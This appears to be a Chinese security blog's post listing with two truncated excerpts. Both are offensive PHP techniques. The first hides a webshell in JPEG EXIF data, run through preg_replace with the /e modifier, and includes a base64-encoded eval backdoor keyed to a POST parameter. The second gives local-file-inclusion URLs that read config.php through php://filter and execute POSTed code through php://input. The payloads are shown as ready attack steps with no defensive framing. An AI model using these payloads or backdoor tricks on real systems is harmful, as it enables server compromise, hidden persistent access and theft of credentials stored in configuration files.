发布时间:2013-10-08 13:53:25
exif_read_data()preg_replace() //把webshell隐藏在jepg的exif中,读出来替换。//$exif = exif_read_data('/123.jpg'); preg_replace($exif['Make'],$exif['Model'],'')//preg_replace ("/.*/e", ,"@ eval ( base64_decode("aWYgKGlzc2V0KCRfUE9TVFsienoxIl0pKSB7ZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30=")).........【阅读全文】
发布时间:2013-06-08 11:52:27
1.http://xxxxxxx/lfi.php?page=php://filter/read=convert.base64-encode/resource=../config.php2.在allow_url_include = on 且 PHP >= 5.2.0 直接POST php代码并执行 http://xxxxx/lfi.php?page=php://input post提交的数据:......【阅读全文】